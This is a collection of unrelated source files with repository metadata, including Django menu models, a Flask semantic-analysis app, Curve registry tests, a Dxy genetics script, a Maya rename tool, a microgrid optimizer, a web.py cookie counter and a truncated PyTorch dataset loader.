    NOTE(review): "Dey" looks like a typo for "Day"; renaming the model
    would require a migration, so it is only flagged here.
    """

    dey_name = models.CharField(max_length=50, verbose_name='День недели')

    class Meta:
        verbose_name = 'День'
        verbose_name_plural = 'Дни'

    def __str__(self) -> str:
        return self.dey_name
class DishWeek(models.Model):
    """Assignment of a dish (with its ingredients) to a day of the week."""

    dish = models.ForeignKey(Dish,
                             related_name='dishweek',
                             verbose_name='Название блюда',
                             on_delete=models.CASCADE,
                             )
    slug = models.SlugField(max_length=50)
    ingredients = models.ForeignKey(Ingredients,
                                    related_name='ingredient',
                                    verbose_name='Ингредиенты',
                                    on_delete=models.CASCADE)
    dey_week = models.ForeignKey(DeyWeek,
                                 related_name='deyweek',
                                 verbose_name='Дни',
                                 on_delete=models.CASCADE)

    class Meta:
        verbose_name = 'Блюдо на неделю'
        verbose_name_plural = 'Блюда на неделю '

    def __str__(self) -> str:
        return f"Блюдо {self.dish}"
class Menu(models.Model):
    """A user's daily menu: one breakfast, lunch and dinner dish plus metadata."""

    author = models.ForeignKey(
        User,
        verbose_name='Автор',
        related_name='Menu',
        on_delete=models.CASCADE)
    title = models.CharField(max_length=200, verbose_name='Заглавление')
    category = models.ForeignKey(Category,
                                 verbose_name='Категория',
                                 related_name='Menu',
                                 on_delete=models.SET_NULL,
                                 null=True)
    created_at = models.DateTimeField(
        auto_now_add=True, verbose_name='Дата создания')
    # NOTE(review): capitalized field name shadows the Ingredients model
    # inside this class body; renaming would require a migration, so it is
    # only flagged here.
    Ingredients = models.ForeignKey(
        Ingredients,
        verbose_name='Ингредиенты',
        related_name='Ингредиент',
        on_delete=models.CASCADE)
    breakfast = models.ForeignKey(
        Dish,
        verbose_name='Завтрак',
        related_name='Завтрак',
        on_delete=models.CASCADE)
    lunch = models.ForeignKey(
        Dish,
        verbose_name='Обед',
        related_name='Обед',
        on_delete=models.CASCADE)
    dinner = models.ForeignKey(
        Dish,
        verbose_name='Ужин',
        related_name='Ужин',
        on_delete=models.CASCADE)
    # NOTE(review): apparently duplicates `created_at` (typo?); kept for
    # schema compatibility and used by __str__ below.
    create_at = models.DateTimeField(
        null=True, blank=True, verbose_name='Дата создания')

    class Meta:
        verbose_name = 'Меню'
        verbose_name_plural = 'Меню'

    def __str__(self):
        return f"Владелец:{self.author} Завтрак: {self.breakfast} Обед: {self.lunch} Ужин:{self.dinner} Дата Создания записи {self.create_at}"
class Recipe(models.Model):
    """Cooking instructions for a dish, optionally attached to a menu."""

    name = models.CharField(max_length=100, verbose_name='Название')
    serves = models.CharField(max_length=50, verbose_name='Служит')
    prep_time = models.DurationField(
        default=0, verbose_name='Время подготовки')
    cook_time = models.DurationField(
        default=0, verbose_name='Время приготовления')
    ingredients = models.ForeignKey(
        Ingredients,
        verbose_name='Ингредиенты',
        related_name='Ингредиенты',
        on_delete=models.CASCADE)
    directions = models.TextField(verbose_name='Направление')
    menu = models.ForeignKey(Menu,
                             verbose_name='Меню',
                             related_name='recipe',
                             on_delete=models.SET_NULL,
                             null=True,
                             blank=True
                             )

    class Meta:
        verbose_name = 'Рецепт'
        verbose_name_plural = 'Рецепты'

    def __str__(self) -> str:
        return self.name
class Comment(models.Model):
    """User comment attached to a menu."""

    title = models.CharField(max_length=50, verbose_name='Заглавление')
    email = models.CharField(max_length=100, verbose_name='Email')
    message = models.TextField(max_length=500, verbose_name='Сообщение')
    menu = models.ForeignKey(Menu,
                             verbose_name='Меню',
                             related_name='comment',
                             on_delete=models.CASCADE,
                             )
    # Kept when the user account is deleted (SET_NULL).
    author = models.ForeignKey(User,
                               verbose_name='Пользователь',
                               on_delete=models.SET_NULL,
                               null=True)

    class Meta:
        verbose_name = 'Коментарий'
        verbose_name_plural = 'Коментарии'

    def __str__(self) -> str:
        return self.title
| Maksat-developer/ProjectDjangoShool | cook/blog/models.py | models.py | py | 6,738 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mptt.models.MPTTModel",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django... |
31213617621 | # set FLASK_APP=app
# set FLASK_ENV=development
# flask run
from flask import Flask, render_template, request
import semsim_funcs
import semtag_funcs
import semnull_funcs
import semcluster_funcs
import textCoder_funcs
app = Flask(__name__)
@app.route('/')
def home():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/semsim')
def semsim():
    """Render the semantic-similarity input form."""
    return render_template('semsim.html')
@app.route('/semsim_results', methods=['GET', 'POST'])
def semsim_results():
    """Compute relative similarities for the submitted word lists and render them."""
    def _csv_words(field):
        # Strip all whitespace, lowercase, then split on commas.
        return ''.join(request.form[field].lower().split()).split(',')

    target_words = _csv_words('target_words')
    contrast_word = request.form['contrast_word']
    pos_words = _csv_words('pos_words')
    neg_words = _csv_words('neg_words')
    relative_sims, target_words, pos_words, neg_words, error_message = \
        semsim_funcs.get_sims(target_words, pos_words, neg_words,
                              contrast_word=contrast_word)
    print(relative_sims)
    targets_with_sims = [
        f"{word} {round(sim, 3)}"
        for word, sim in zip(target_words, relative_sims)
    ]
    return render_template('semsim_results.html', error_message=error_message, targets_with_sims=targets_with_sims, target_words=target_words, pos_words=pos_words, neg_words=neg_words, relative_sims=relative_sims, contrast_word=contrast_word)
@app.route('/semtag')
def semtag():
    """Render the semantic-tagging input form."""
    return render_template('semtag.html')
@app.route('/semtag_results', methods=['GET', 'POST'])
def semtag_results():
    """Tag the submitted text and render per-paragraph and overall results."""
    text = request.form['text']
    tags = request.form['tags']
    (tags_in_vocab, output_all, output_sim_all, output_per_paragraph,
     output_sim_per_paragraph, output_paragraphs) = semtag_funcs.get_semtags(text, tags)
    tags_in_vocab_str = ','.join(tags_in_vocab)
    output_per_paragraph_str = ','.join(output_per_paragraph)
    output_sim_per_paragraph_str = ','.join(
        str(round(sim, 3)) for sim in output_sim_per_paragraph)
    text = text.split('\n')
    output_tag_with_sim_per_paragraph = [
        f"{tag} {round(sim, 3)}"
        for tag, sim in zip(output_per_paragraph, output_sim_per_paragraph)
    ]
    output_tag_with_sim_all = [
        f"{tag} {round(sim, 3)}"
        for tag, sim in zip(output_all, output_sim_all)
    ]
    # [tag, rounded similarity, paragraph text] per paragraph.
    nested_info_per_paragraph = [
        [tag, round(sim, 3), paragraph]
        for tag, sim, paragraph in zip(output_per_paragraph,
                                       output_sim_per_paragraph,
                                       output_paragraphs)
    ]
    return render_template('semtag_results.html', nested_info_per_paragraph=nested_info_per_paragraph,output_tag_with_sim_per_paragraph=output_tag_with_sim_per_paragraph, output_tag_with_sim_all=output_tag_with_sim_all,tags_in_vocab_str=tags_in_vocab_str, text=text, output_all=output_all, output_sim_all=output_sim_all, output_per_paragraph_str=output_per_paragraph_str, output_sim_per_paragraph_str=output_sim_per_paragraph_str)
@app.route('/semnull')
def semnull():
    """Render the null-distribution testing input form."""
    return render_template('semnull.html')
@app.route('/semnull_results', methods=['GET', 'POST'])
def semnull_results():
    """Build a null distribution of scores and test the target words against it."""
    def _csv_words(field):
        # Strip all whitespace, lowercase, then split on commas.
        return ''.join(request.form[field].lower().split()).split(',')

    target_words = _csv_words('target_words')
    contrast_word = request.form['contrast_word']
    pos_words = _csv_words('pos_words')
    neg_words = _csv_words('neg_words')
    scores_to_test = request.form['scores_to_test']
    template_sentence = request.form['template_sentence']
    template_pos = request.form['template_pos']
    print(target_words)
    print(contrast_word)
    null_distr_scores = semnull_funcs.get_semnull(pos_words, neg_words,
                                                  template_sentence, template_pos)
    N_random_words_found = len(null_distr_scores)
    print(N_random_words_found)
    p_values, target_words_scores, target_words_output, scores_to_test_output, error_message = \
        semnull_funcs.get_p(target_words, pos_words, neg_words, scores_to_test,
                            null_distr_scores, contrast_word=contrast_word)
    target_words_output.extend(scores_to_test_output)
    print(p_values)
    # [label, rounded score, p-value] rows for the results table.
    p_values_nested = [
        [label, round(score, 3), p]
        for label, score, p in zip(target_words_output, target_words_scores, p_values)
    ]
    print(p_values_nested)
    return render_template('semnull_results.html', error_message=error_message,null_distr_scores=null_distr_scores, N_random_words_found=N_random_words_found, p_values_nested=p_values_nested)
@app.route('/textCoder')
def textCoder():
    """Render the text-coder input form."""
    return render_template('textCoder.html')
@app.route('/textCoder_results', methods=['GET', 'POST'])
def textCoder_results():
    """Run the knowledge coder over the text and render topic/attribute tables."""
    text = request.form['text']
    print(text)
    knowledge_list = textCoder_funcs.get_textCoder(text)
    topics_str = ','.join(k[0] for k in knowledge_list)
    attributes_str = ', '.join(a[0] for k in knowledge_list for a in k[1])
    text_in_paragraphs = text.split("\n")
    topic_names = [k[0] for k in knowledge_list]
    # Attribute strings per topic: plain, with counts, with paragraph indices.
    attr_plain = [', '.join(a[0] for a in k[1]) for k in knowledge_list]
    attr_with_count = [', '.join(a[0] + " (" + str(a[1]) + ")" for a in k[1])
                       for k in knowledge_list]
    attr_with_parindex = [', '.join(a[0] + " (" + str(a[2]) + ")" for a in k[1])
                          for k in knowledge_list]
    nested_info_per_paragraph = [list(pair) for pair in zip(topic_names, attr_plain)]
    nested_info_per_paragraph_count = [list(pair) for pair in zip(topic_names, attr_with_count)]
    nested_info_per_paragraph_parindex = [list(pair) for pair in zip(topic_names, attr_with_parindex)]
    return render_template('textCoder_results.html', topics_str=topics_str, attributes_str=attributes_str, nested_info_per_paragraph=nested_info_per_paragraph, text_in_paragraphs=text_in_paragraphs,nested_info_per_paragraph_count=nested_info_per_paragraph_count,nested_info_per_paragraph_parindex=nested_info_per_paragraph_parindex)
@app.route('/semcluster')
def semcluster():
    """Render the clustering input form."""
    return render_template('semcluster.html')
@app.route('/semcluster_results', methods=['GET', 'POST'])
def semcluster_results():
    """Cluster the submitted words and render the labelled clusters."""
    words = request.form['words']
    cluster_labels, cluster_items = semcluster_funcs.get_clusters(words)
    cluster_info = [
        ['Cluster label: ' + label, 'Items: ' + ', '.join(items)]
        for label, items in zip(cluster_labels, cluster_items)
    ]
    return render_template('semcluster_results.html', words=words, cluster_info=cluster_info)
| thomasgladwin/webapps | app.py | app.py | py | 6,804 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request... |
6143716089 | import itertools
import math
from collections import defaultdict
import brownie
import pytest
from scripts.utils import pack_values
ZERO_ADDRESS = "0x0000000000000000000000000000000000000000"
@pytest.fixture(scope="module", autouse=True)
def registry(
    Registry,
    provider,
    gauge_controller,
    alice,
    lending_swap,
    lp_token,
    n_coins,
    is_v1,
    rate_method_id,
    underlying_decimals,
    wrapped_decimals,
    chain,
):
    """Deploy a Registry, add the lending pool, then remove it again.

    Every test in this module therefore runs against a registry whose pool
    has already been removed, and asserts that lookups return empty values.
    """
    registry = Registry.deploy(provider, gauge_controller, {"from": alice})
    registry.add_pool(
        lending_swap,
        n_coins,
        lp_token,
        rate_method_id,
        pack_values(wrapped_decimals),
        pack_values(underlying_decimals),
        hasattr(lending_swap, "initial_A"),  # presumably flags newer pools exposing initial_A — verify against add_pool ABI
        is_v1,
        "",
        {"from": alice},
    )
    chain.sleep(10)
    registry.remove_pool(lending_swap, {"from": alice})
    yield registry
@pytest.mark.itercoins("send", "recv")
def test_find_pool(registry, wrapped_coins, underlying_coins, send, recv):
assert registry.find_pool_for_coins(wrapped_coins[send], wrapped_coins[recv]) == ZERO_ADDRESS
assert (
registry.find_pool_for_coins(underlying_coins[send], underlying_coins[recv]) == ZERO_ADDRESS
)
def test_get_n_coins(registry, lending_swap):
assert registry.get_n_coins(lending_swap) == [0, 0]
def test_get_coins(registry, lending_swap):
assert registry.get_coins(lending_swap) == [ZERO_ADDRESS] * 8
assert registry.get_underlying_coins(lending_swap) == [ZERO_ADDRESS] * 8
def test_get_decimals(registry, lending_swap):
assert registry.get_decimals(lending_swap) == [0] * 8
assert registry.get_underlying_decimals(lending_swap) == [0] * 8
def test_get_rates(registry, lending_swap):
assert registry.get_rates(lending_swap) == [0] * 8
@pytest.mark.itercoins("send", "recv")
def test_get_coin_indices(registry, lending_swap, underlying_coins, wrapped_coins, send, recv):
with brownie.reverts("No available market"):
registry.get_coin_indices(lending_swap, wrapped_coins[send], wrapped_coins[recv])
with brownie.reverts("No available market"):
registry.get_coin_indices(lending_swap, underlying_coins[send], underlying_coins[recv])
@pytest.mark.once
def test_get_balances(registry, lending_swap):
with brownie.reverts():
registry.get_balances(lending_swap)
@pytest.mark.once
def test_get_underlying_balances(registry, lending_swap):
with brownie.reverts():
registry.get_underlying_balances(lending_swap)
@pytest.mark.once
def test_get_admin_balances(registry, lending_swap):
with brownie.reverts():
registry.get_admin_balances(lending_swap)
@pytest.mark.once
def test_get_virtual_price_from_lp_token(alice, registry, lp_token):
with brownie.reverts():
registry.get_virtual_price_from_lp_token(lp_token)
@pytest.mark.once
def test_get_pool_from_lp_token(registry, lp_token):
assert registry.get_pool_from_lp_token(lp_token) == ZERO_ADDRESS
@pytest.mark.once
def test_get_lp_token(registry, lending_swap):
assert registry.get_lp_token(lending_swap) == ZERO_ADDRESS
def test_coin_count_is_correct(registry):
assert registry.coin_count() == 0
def test_get_all_swappable_coins(registry, wrapped_coins, underlying_coins):
    # With the pool removed, every registered coin slot must be the zero address.
    unique_coins = {str(coin) for coin in itertools.chain(wrapped_coins, underlying_coins)}
    fetched = {registry.get_coin(i) for i in range(len(unique_coins))}
    assert fetched == {ZERO_ADDRESS}
@pytest.mark.once
def test_last_updated_getter(registry, history):
registry_txs = history.filter(receiver=registry.address)
assert math.isclose(registry_txs[-1].timestamp, registry.last_updated())
def test_coin_swap_count(registry, wrapped_coins, underlying_coins):
coins = set(map(str, itertools.chain(wrapped_coins, underlying_coins)))
for coin in coins:
assert registry.get_coin_swap_count(coin) == 0
def test_swap_coin_for(registry, wrapped_coins, underlying_coins):
    """All swap complements must be the zero address once the pool is removed."""
    wrapped_coins = list(map(str, wrapped_coins))
    underlying_coins = list(map(str, underlying_coins))
    # Build every coin pairing the (removed) pool would have offered:
    # wrapped coins pair among themselves, underlying coins likewise.
    pairings = defaultdict(set)
    wrapped_pairs = itertools.combinations(wrapped_coins, 2)
    underlying_pairs = itertools.combinations(underlying_coins, 2)
    for coin_a, coin_b in itertools.chain(wrapped_pairs, underlying_pairs):
        pairings[coin_a].add(coin_b)
        pairings[coin_b].add(coin_a)
    for coin in pairings.keys():
        coin_swap_count = len(pairings[coin])
        available_swaps = {
            registry.get_coin_swap_complement(coin, i) for i in range(coin_swap_count)
        }
        # Only the zero address should remain in every pairing slot.
        assert available_swaps == {ZERO_ADDRESS}
| curvefi/curve-pool-registry | tests/local/unitary/Registry/test_remove_pool_lending.py | test_remove_pool_lending.py | py | 4,686 | python | en | code | 169 | github-code | 36 | [
{
"api_name": "scripts.utils.pack_values",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "scripts.utils.pack_values",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pytest.fixture",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "py... |
6262380149 | import os,sys,re
import slide_window
import vcf_operating
import read_group
import read_dict
from multiprocessing import Pool
#https://github.com/mfumagalli/ngsPopGen/blob/9ee3a6d5e733c1e248e81bfc21514b0527da967b/scripts/getDxy.pl
def help():
    """Print usage information for the dxy script and abort."""
    print("python3 xx.py vcf two_group_list fasta_fai outfile window step")
    print("two_group_list: classA\tHH1\nclassB\tHH2\nclassB\tHH3")
    sys.exit()
def maf_1_0(list_):
    """Return [frequency of '0' alleles, frequency of '1' alleles].

    Counts the characters '0' and '1' across all genotype strings in
    *list_*; returns [0, 0] when no called alleles are present.
    """
    ref_alleles = sum(genotype.count('0') for genotype in list_)
    alt_alleles = sum(genotype.count('1') for genotype in list_)
    total = ref_alleles + alt_alleles
    if total == 0:
        return [0, 0]
    return [ref_alleles / total, alt_alleles / total]
def each_maf(line):
    """Allele frequencies of both sample groups for one split VCF record.

    Relies on module globals loci1/loci2 (column indices) set in every_dxy().
    """
    # Genotype call is the first 3 characters of each sample field, e.g. '0/1'.
    types1=[line[x][:3] for x in loci1]
    types2=[line[x][:3] for x in loci2]
    # [group1 freq('0'), group1 freq('1'), group2 freq('0'), group2 freq('1')]
    all_maf=maf_1_0(types1)+maf_1_0(types2)
    return all_maf
def each_dxy(line_):
    """Per-SNP Dxy for one raw VCF line: p1*q2 + q1*p2 across the two groups."""
    line=line_.split()
    chr_,pos=line[0],int(line[1])
    # all_maf = [g1 freq('0'), g1 freq('1'), g2 freq('0'), g2 freq('1')]
    all_maf=each_maf(line)
    dxy=all_maf[0]*all_maf[3]+all_maf[1]*all_maf[2]
    return [chr_,pos,dxy]
def every_dxy(vcfs):
    """Compute per-SNP Dxy for all records; returns {chrom: {pos: dxy}}.

    Sites with zero Dxy are dropped. Sets module globals loci1/loci2 (sample
    column indices) used by each_maf() in the worker processes.
    """
    head=next(vcfs).split()
    global loci1,loci2
    loci1=[head.index(x) for x in group_dict[group1]]
    loci2=[head.index(x) for x in group_dict[group2]]
    po1=Pool(theads)
    all_dxy=po1.map(each_dxy,vcfs)
    po1.close()
    dxy_dict={}
    for list_ in all_dxy:
        if list_[2]==0:
            # No between-group divergence at this site; skip.
            continue
        dxy_dict.setdefault(list_[0],{}).setdefault(list_[1],list_[2])
    return dxy_dict
def window_dxy(cal_window):
    """Aggregate per-SNP Dxy inside one [chrom, start, end] window.

    Reads the module globals dxy_dict / dxy_snp_pos_dict. Returns
    [chrom, start, end, n_snp, dxy] as strings, or None for empty windows.
    """
    chr_=cal_window[0]
    if chr_ not in dxy_snp_pos_dict:
        return
    chr_snp_pos=dxy_snp_pos_dict[chr_]
    N_SNP,ALL_DXY=0,0
    for pos in chr_snp_pos:
        if pos<cal_window[1]:
            continue
        elif cal_window[1]<=pos<=cal_window[2]:
            N_SNP+=1
            ALL_DXY+=dxy_dict[chr_][pos]
        elif pos >cal_window[2]:
            # Positions are sorted, so nothing further can fall in this window.
            break
    if ALL_DXY==0 or N_SNP==0:
        return
    # Normalise by window length to get per-base Dxy.
    ALL_DXY=ALL_DXY/(cal_window[2]-cal_window[1]+1)
    return [cal_window[0],str(cal_window[1]),str(cal_window[2]),str(N_SNP),str(ALL_DXY)]
def write_result(all_window_dxy, out_file):
    """Sort windows by (chromosome, numeric start) and write a TSV report."""
    all_window_dxy.sort(key=lambda row: (row[0], int(row[1])))
    with open(out_file, 'w') as out:
        out.write('CHROM\tSTART\tEND\tN_SNP\tDXY\n')
        for row in all_window_dxy:
            out.write('\t'.join(row) + '\n')
def main(vcf_file,group_file,fasta_fai,out_file,window,step):
    """Compute windowed Dxy between the two sample groups and write a TSV."""
    global group_dict,group1,group2
    group_dict=read_group.Read_group1(group_file)
    [group1,group2]=list(group_dict.keys())
    vcfs=For_vcf.vcf_read2(vcf_file)
    global dxy_dict,dxy_snp_pos_dict
    dxy_dict=every_dxy(vcfs)
    dxy_snp_pos_dict={}
    for chr_ in dxy_dict:
        # Sorted positions let window_dxy() break out of its scan early.
        dxy_snp_pos_dict[chr_]=sorted(dxy_dict[chr_].keys())
    chr_len_dict=read_dict.read_fai(fasta_fai)
    all_windows=[]
    #[[chr,start,end]]
    for chr_ in chr_len_dict:
        all_windows+=slide_window.slide_window2(chr_,window,step,1,chr_len_dict[chr_])
    po2=Pool(theads)
    all_window_dxy=po2.map(window_dxy,all_windows)
    po2.close()
    #all_window_dxy=list(filter(None,all_window_dxy))
    # Drop the None results produced by empty windows.
    all_window_dxy=[x for x in all_window_dxy if x !=None]
    write_result(all_window_dxy,out_file)
if __name__=="__main__":
try:
[vcf_file,group_file,fasta_fai,out_file]=sys.argv[1:5]
window=int(sys.argv[5])
step=int(sys.argv[6])
except:
help()
theads=30
For_vcf=vcf_operating.for_vcf()
main(vcf_file,group_file,fasta_fai,out_file,window,step)
| ZJin2021/SCRIPT_ostrya | script/Population_Genetics/dxy.py | dxy.py | py | 3,460 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.exit",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "read_group.Read_group1",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "read_dict.read_f... |
14017937824 | import maya.cmds as cmds
from functools import partial
def rename_sl(*args):
    """Rename every selected node to the name typed in the 'Rename' field."""
    new_name = cmds.textField('Rename', q = True, text =True)
    items = cmds.ls(sl=True)
    for item in items:
        cmds.rename(item , new_name)
def replace_sl(*args):
    """Rename selected nodes, substituting the 'before' text with the 'after' text."""
    name_to_replace = cmds.textField('RePlace_before', q = True, text =True)
    replace_name = cmds.textField('RePlace_after', q = True, text =True)
    items = cmds.ls(sl=True)
    for item in items:
        new_name = item.replace(name_to_replace, replace_name)
        cmds.rename(item , new_name)
def rename_sl_ui():
    '''
    Build the rename tool window: one row for bulk rename and one row
    for find-and-replace over the current selection.
    '''
    cmds.window()
    cmds.columnLayout()
    # Row 1: rename all selected nodes to a single new name.
    cmds.rowLayout(nc=3)
    cmds.text(label='input')
    rename_input = cmds.textField('Rename', text='new_name', ed=True)
    cmds.button(c=rename_sl, label='Rename')
    cmds.setParent('..')
    # Row 2: substring find-and-replace on the selected node names.
    cmds.rowLayout(nc=5)
    cmds.text(label='before')
    cmds.textField('RePlace_before', text='name', ed=True)
    cmds.text(label='after')
    cmds.textField('RePlace_after', text='new_name', ed=True)
    cmds.button(c=replace_sl, label='Replace')
    cmds.setParent('..')
    #name_button = cmds.textFieldButtonGrp('Rename',label='input', text='name',ed = True, buttonLabel='Rename', bc=rename_sl)
    #name_button = cmds.textFieldButtonGrp('Replace',label='input', text='name',ed = True, buttonLabel='Replace', bc=rename_sl)
    cmds.showWindow()
rename_sl_ui() | s-nako/MayaPythonTools | ModelingTools/name_change/rename_sl.py | rename_sl.py | py | 1,426 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "maya.cmds.textField",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "maya.cmds",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "maya.cmds.ls",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "maya.cmds",
"line_number"... |
72673433065 | import time
start_time = time.time()
from global_var import *
from demandSimulate import *
from oneStepOptimization_poly import *
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from scipy.stats import qmc
def microgrid_poly2d():
# stock
alpha = 0.5; K0 = 0; sigma = 2; processType = "Regular";
# backward simulation
sampler = qmc.Sobol(d=2, scramble=False)
# 512 samples
W = sampler.random_base2(m=9)
X0 = -10 + 20*W[:,0]; # X0 in [-10,10]
ICord = 10*W[:,1]; # Ic in[0,Imax = 10]
ICord_rep = np.repeat(ICord,batch);
X0_rep = np.repeat(X0,batch);
demandMatrix = demandSimulate(alpha, K0, sigma, 1, nsim, dt, X0_rep);
# I0 is 5
finalCost = -200 * ((ICord_rep-5))*(ICord_rep<5)
# 20 rows, 512 columns,create 20x512 matrix, filled by column wise with order = "F" (default fill row),
# take row sum mean to get final cost for each starting site
finalCost = np.mean(finalCost.reshape((batch,sites),order = "F"),axis = 0)
costNext = np.zeros((sites,no_regime));
for r in range(no_regime):
costNext[:,r] = finalCost;
modelIndx = 0; Model = [None] * (nstep)
polyMdl = [None]*no_regime
for iStep in range(nstep,0,-1):
for r in range(no_regime):
polyMdl[r] = LinearRegression()
X_train = np.column_stack((X0, ICord))
poly = preprocessing.PolynomialFeatures(degree=3)
X_poly = poly.fit_transform(X_train)
y_train = costNext[:, r]
polyMdl[r].fit(X_poly, y_train)
print(iStep)
print(costNext[:10,0])
print("\n")
# generate X_t
demandMatrix = demandSimulate(alpha, K0, sigma, 1, nsim, dt, X0_rep);
# optimize basedd on X_t-1,I_t
cost, _, control, nextInventory, nextRegime, imbalance, batteryOutput =oneStepOptimization_microgrid(
demandMatrix[:, 1], ICord_rep, polyMdl)
for r in range(no_regime):
costNext[:, r] = np.mean(cost[:, r].reshape((batch, sites),order = "F"), axis=0)
Model[modelIndx] = polyMdl.copy();
modelIndx+=1;
# forward simulations
np.random.seed(10)
simOutSample = 2000;
X0 = np.zeros(simOutSample);
I0 = 5;
demandMatrix = demandSimulate(alpha, K0, sigma, nstep, simOutSample, maturity, X0);
inventoryForward = np.zeros((simOutSample,nstep+1));
inventoryForward[:, 0] = I0
regimeForward = np.zeros((simOutSample, nstep + 1))
regimeForward[:, 0] = 0
Bt = np.zeros((simOutSample, nstep))
St = np.zeros((simOutSample, nstep))
dieselPower = np.zeros((simOutSample, nstep))
trueCost = np.zeros((simOutSample, nstep))
artificialCost = np.zeros((simOutSample, nstep))
costForward = np.zeros((simOutSample, nstep + 1))
for iStep in range(nstep):
_, _, control, nextInventory, nextRegime, imbalance, batteryOutput = \
oneStepOptimization_microgrid(demandMatrix[:, iStep], inventoryForward[:, iStep], Model[nstep - iStep-1])
row_idx = tuple(np.arange(0,simOutSample))
col_idx = tuple(np.int64(regimeForward[:,iStep]))
inventoryForward[:, iStep + 1] = nextInventory[row_idx,col_idx]
regimeForward[:, iStep + 1] = nextRegime[row_idx,col_idx]
Bt[:, iStep] = batteryOutput[row_idx,col_idx]
St[:, iStep] = imbalance[row_idx,col_idx]
dieselPower[:, iStep] = control[row_idx,col_idx]
trueCost[:, iStep] = k[0] * (dieselPower[:, iStep] ** 0.9) * dt + switchCost * (regimeForward[:, iStep + 1] > regimeForward[:, iStep])
artificialCost[:, iStep] = k[1] * St[:, iStep] * (St[:, iStep] > 0) * dt - k[2] * St[:, iStep] * (St[:, iStep] < 0) * dt
penalty = -200 * (inventoryForward[:, -1] - I0) * (inventoryForward[:, -1] < I0)
costForward = trueCost + artificialCost
pathWiseCost = np.sum(costForward, axis=1) + penalty
totalCost = np.mean(pathWiseCost)
stdDeviation = np.std(pathWiseCost) / np.sqrt(simOutSample)
totalTrueCost = np.mean(np.sum(trueCost, axis=1))
totalArtificialCost = np.mean(np.sum(artificialCost, axis=1))
print(f'nsim: {sites} x {batch}, regime=1, totalCost= {totalCost}, totalTrueCost= {totalTrueCost}, totalArtificialCost= {totalArtificialCost}')
if __name__ == "__main__":
microgrid_poly2d()
print(f'Running time: {time.time()- start_time} s') | thihaa2019/WindEnergy | Aditya(Python)/microgrid_poly2d.py | microgrid_poly2d.py | py | 4,451 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "scipy.stats.qmc.Sobol",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "scipy.stats.qmc",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.linear_model.L... |
23343506239 | """
NOMBRE: Maria del Carmen Hernandez Diaz
ACCOUNT: 1718110389
GROUP: TIC 51
DATE: 30-05-2020
DESCRIPTION: Creación de cookies con nombre, número de visitas, fecha, y hora del visitante.
En caso de que no haya nombre como respuesta del usuario se marcara como 'Anónimo'.
"""
import web # Librería de web.py
import datetime # Librería para manipulación de fecha y tiempo.
class Visitas:
    """web.py handler: greets the visitor and tracks visits via cookies."""
    def GET(self, name):
        try:
            # Cookie handling.
            cookie = web.cookies()
            visitas = "0"
            print(cookie)
            # Capture the current date and time for the visit stamp.
            date = datetime.datetime.now()
            dateV = date.strftime('%a, %d-%m-%Y') # Format: weekday, day-month-year.
            hourV = date.strftime('%H:%M:%S') # Format: hour:minute:second.
            # Date cookie.
            # NOTE(review): the if/else branches below are identical, and
            # strftime never returns an empty string — the else arms are dead.
            if dateV:
                web.setcookie("dateV", dateV, expires="", domain=None)
            else:
                web.setcookie("dateV", dateV, expires ="", domain=None)
            # Hour cookie.
            if hourV:
                web.setcookie("hourV", hourV, expires="", domain=None)
            else:
                web.setcookie("hourV", hourV, expires ="", domain=None)
            # Name cookie.
            if name:
                web.setcookie("nombre", name, expires="", domain=None)
            else:
                name="Anónimo" # Fallback when the visitor gave no name.
                web.setcookie("nombre", name, expires ="", domain=None)
            # Visit counter cookie.
            if cookie.get("visitas"):
                visitas = int(cookie.get("visitas"))
                visitas += 1 # Increment the visit counter.
                web.setcookie("visitas", str(visitas), expires ="", domain=None)
            else:
                web.setcookie("visitas", str(1), expires ="", domain=None)
                visitas = "1"
            # Return the greeting with name, visit count, date and hour.
            return "Bienvenido." + "\n" + "\n" + "Nombre: " + str(name) + "\n" + "No. Visitas: " + str(visitas) + "\n" + "Fecha visita: " + str(dateV) + "\n" + "Hora visita: " + str(hourV)
        except Exception as e:
            return "Error" + str(e.args) # On failure, return the error details.
{
"api_name": "web.cookies",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "web.setcooki... |
31124460363 | import os
import torch
import numpy as np
from torch.utils.data import Dataset
import h5py
class DataSet(Dataset):
    """Loads image + segmentation-label samples from per-case HDF5 files.

    The split list file ('dataset/<split>.list') names one case directory
    per line; each case directory contains 'mri_norm2.h5' with 'image'
    and 'label' datasets.
    """
    def __init__(self, transform, split='train'):
        # transform: callable applied to each {'image', 'label'} sample (may be None).
        self.image_list = []
        self.transform = transform
        file_list_path = os.path.join('dataset', split + '.list')
        with open(file_list_path, 'r') as f:
            for line in f:
                self.image_list.append(os.path.join('dataset', os.path.join(line.strip(), 'mri_norm2.h5')))
    def __len__(self):
        """Number of cases in this split."""
        return len(self.image_list)
    def __getitem__(self, index):
        """Read one case from its HDF5 file and apply the transform, if any."""
        content = h5py.File(self.image_list[index], 'r')
        image = content['image'][:]
        label = content['label'][:]
